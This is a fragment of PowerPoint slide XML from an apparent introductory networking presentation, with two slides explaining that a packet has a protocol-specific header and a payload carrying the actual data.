              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B2186F2-0BC0-57CD-14A0-D180769E0696}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5680328" y="3006928"/>
            <a:ext cx="13931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2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29A17B11-80BB-7BC3-85DA-E03E8C84B0B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D927C5D1-A129-AAE0-CE79-4DE068D1E45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25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105677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6A2D187-B97D-E921-5505-6E7FD44043EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="323850" y="4799838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1F85484-7707-E5CD-D00A-D92CC0C396A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="411276" y="254888"/>
            <a:ext cx="230251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Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>2 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2900" b="1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900" b="1" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>Packets</a:t>
            </a:r>
            <a:endParaRPr sz="2900" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Robo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8918013-112C-236D-2643-FC2AEB66074E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="410667" y="1859991"/>
            <a:ext cx="3204210" cy="2372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header</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" b="1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has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a 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protocol-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specific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structure:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="22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this</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="22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ensures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2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receiving</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="22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host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2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correctly</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="22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interpret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payload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handle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overall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communication.</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Roboto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421B9E43-C766-A3D7-E764-3FBBBC08CA11}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4256468" y="1632140"/>
            <a:ext cx="4241800" cy="806450"/>
            <a:chOff x="4256468" y="1632140"/>
            <a:chExt cx="4241800" cy="806450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B37B2EF7-7BCB-D436-C802-C83031096AB2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4269485" y="1645157"/>
              <a:ext cx="4215765" cy="780415"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4215765" h="780414">
                  <a:moveTo>
                    <a:pt x="4137406" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="77977" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47630" y="6129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22844" y="22844"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6129" y="47630"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="77977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="702309"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6129" y="732657"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22844" y="757443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47630" y="774158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="77977" y="780287"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4137406" y="780287"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4167753" y="774158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4192539" y="757443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4209254" y="732657"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4215384" y="702309"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4215384" y="77977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4209254" y="47630"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4192539" y="22844"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4167753" y="6129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="413740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02EDD6C-3C12-177A-E8BA-59D50040651F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4269485" y="1645157"/>
              <a:ext cx="4215765" cy="780415"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4215765" h="780414">
                  <a:moveTo>
                    <a:pt x="0" y="77977"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6129" y="47630"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22844" y="22844"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47630" y="6129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="77977" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4137406" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4167753" y="6129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4192539" y="22844"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4209254" y="47630"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4215384" y="77977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4215384" y="702309"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4209254" y="732657"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4192539" y="757443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4167753" y="774158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4137406" y="780287"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="77977" y="780287"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47630" y="774158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22844" y="757443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6129" y="732657"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="702309"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="77977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F1F14D22-FA26-CD21-74F3-6AC68A04F4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23635" y="1712213"/>
            <a:ext cx="13081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1" name="object 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1681907-F161-977F-0B61-6FBA7D4BBC75}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4261103" y="2485644"/>
            <a:ext cx="4232275" cy="1689100"/>
            <a:chOff x="4261103" y="2485644"/>
            <a:chExt cx="4232275" cy="1689100"/>
          </a:xfrm>
        </p:grpSpPr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248F4937-7B79-A446-56CD-682F519F2A9C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4274057" y="2498598"/>
              <a:ext cx="4206240" cy="1663064"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4206240" h="1663064">
                  <a:moveTo>
                    <a:pt x="4039996" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="166242" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="122046" y="5937"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82333" y="22695"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48688" y="48688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22695" y="82333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5937" y="122046"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="166243"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1496415"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5937" y="1540618"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22695" y="1580337"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48688" y="1613987"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82333" y="1639984"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="122046" y="1656745"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="166242" y="1662683"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4039996" y="1662683"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4084193" y="1656745"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4123906" y="1639984"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4157551" y="1613987"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4183544" y="1580337"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4200302" y="1540618"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4206240" y="1496415"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4206240" y="166243"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4200302" y="122046"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4183544" y="82333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4157551" y="48688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4123906" y="22695"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4084193" y="5937"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="403999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BEFF1392-C205-98D4-6DED-D8B49E824510}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4274057" y="2498598"/>
              <a:ext cx="4206240" cy="1663064"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4206240" h="1663064">
                  <a:moveTo>
                    <a:pt x="0" y="166243"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5937" y="122046"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22695" y="82333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48688" y="48688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82333" y="22695"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="122046" y="5937"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="166242" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4039996" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4084193" y="5937"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4123906" y="22695"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4157551" y="48688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4183544" y="82333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4200302" y="122046"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4206240" y="166243"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4206240" y="1496415"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4200302" y="1540618"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4183544" y="1580337"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4157551" y="1613987"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4123906" y="1639984"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4084193" y="1656745"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4039996" y="1662683"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="166242" y="1662683"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="122046" y="1656745"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82333" y="1639984"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48688" y="1613987"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22695" y="1580337"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5937" y="1540618"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1496415"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="166243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2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB3494E0-A7F3-DA9A-6FEC-5D392BA5F148}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5680328" y="3006928"/>
            <a:ext cx="13931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2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2149C455-5605-74CA-4B6B-8225C69BB0CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3499103" y="1804416"/>
            <a:ext cx="774700" cy="388620"/>
            <a:chOff x="3499103" y="1804416"/>
            <a:chExt cx="774700" cy="388620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4630129-0C0D-295D-9685-B426EBF49147}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3505199" y="1810512"/>
              <a:ext cx="762000" cy="376555"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="762000" h="376555">
                  <a:moveTo>
                    <a:pt x="573786" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="573786" y="94106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="94106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="282320"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="573786" y="282320"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="573786" y="376427"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="762000" y="188213"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5737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552122DC-29DB-F861-3088-30A5FD93A62E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3505199" y="1810512"/>
              <a:ext cx="762000" cy="376555"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="762000" h="376555">
                  <a:moveTo>
                    <a:pt x="0" y="94106"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="573786" y="94106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="573786" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="762000" y="188213"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="573786" y="376427"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="573786" y="282320"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="282320"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="94106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6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AEEB6CCF-6763-71E5-618D-63A084BFAF9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C894B38F-42A8-7289-ECF4-9A688DFE73D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26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237955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2C59DD5-9196-69E6-8D10-41CF851BB082}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="323850" y="4799838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83A6EA3-83EB-6E91-49C2-ED4853EDAA24}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="411276" y="254888"/>
            <a:ext cx="230251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Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2900" b="1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2900" b="1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900" b="1" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>Packets</a:t>
            </a:r>
            <a:endParaRPr sz="2900" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Robo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7CDEA2-FBCA-3BD0-DC99-E4AA69EC1FDF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="410667" y="1900808"/>
            <a:ext cx="3126740" cy="203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payload</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="22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actual information.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2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could</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="22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be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something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like</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="22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part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an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email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message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content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file</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="22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during</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200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a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download.</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Roboto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F02342BE-4CB1-34BC-E30C-218C7834EB4D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4256532" y="1632204"/>
            <a:ext cx="4241800" cy="806450"/>
            <a:chOff x="4256532" y="1632204"/>
            <a:chExt cx="4241800" cy="806450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2AF0919D-DE0B-B4A3-2D04-0052B3700882}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4269486" y="1645158"/>
              <a:ext cx="4215765" cy="780415"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4215765" h="780414">
                  <a:moveTo>
                    <a:pt x="4137406" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="77977" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47630" y="6129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22844" y="22844"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6129" y="47630"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="77977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="702309"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6129" y="732657"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22844" y="757443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47630" y="774158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="77977" y="780287"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4137406" y="780287"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4167753" y="774158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4192539" y="757443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4209254" y="732657"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4215384" y="702309"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4215384" y="77977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4209254" y="47630"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4192539" y="22844"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4167753" y="6129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="413740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9A9384F7-9957-CDA2-6673-B38AA0A98E2D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4269486" y="1645158"/>
              <a:ext cx="4215765" cy="780415"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4215765" h="780414">
                  <a:moveTo>
                    <a:pt x="0" y="77977"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6129" y="47630"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22844" y="22844"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47630" y="6129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="77977" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4137406" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4167753" y="6129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4192539" y="22844"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4209254" y="47630"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4215384" y="77977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4215384" y="702309"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4209254" y="732657"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4192539" y="757443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4167753" y="774158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4137406" y="780287"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="77977" y="780287"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47630" y="774158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22844" y="757443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6129" y="732657"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="702309"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="77977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2B5C7349-6F1D-71C0-D32A-B67530A6D0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23635" y="1712213"/>
            <a:ext cx="13081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1" name="object 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27E9C9B5-AB48-384F-49D2-D7241EEBD5A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4261040" y="2485580"/>
            <a:ext cx="4232275" cy="1689100"/>
            <a:chOff x="4261040" y="2485580"/>
            <a:chExt cx="4232275" cy="1689100"/>
          </a:xfrm>
        </p:grpSpPr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3593B895-A961-011A-2D5E-7FA655969B35}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4274058" y="2498597"/>
              <a:ext cx="4206240" cy="1663064"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4206240" h="1663064">
                  <a:moveTo>
                    <a:pt x="4039996" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="166242" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="122046" y="5937"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82333" y="22695"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48688" y="48688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22695" y="82333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5937" y="122046"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="166243"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1496415"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5937" y="1540618"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22695" y="1580337"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48688" y="1613987"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82333" y="1639984"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="122046" y="1656745"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="166242" y="1662683"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4039996" y="1662683"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4084193" y="1656745"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4123906" y="1639984"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4157551" y="1613987"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4183544" y="1580337"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4200302" y="1540618"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4206240" y="1496415"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4206240" y="166243"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4200302" y="122046"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4183544" y="82333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4157551" y="48688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4123906" y="22695"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4084193" y="5937"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="403999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605FC9D8-42B1-A7AB-E52D-98E68F5C4F0D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4274058" y="2498597"/>
              <a:ext cx="4206240" cy="1663064"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4206240" h="1663064">
                  <a:moveTo>
                    <a:pt x="0" y="166243"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5937" y="122046"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22695" y="82333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48688" y="48688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82333" y="22695"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="122046" y="5937"/>
                  </a:lnTo>
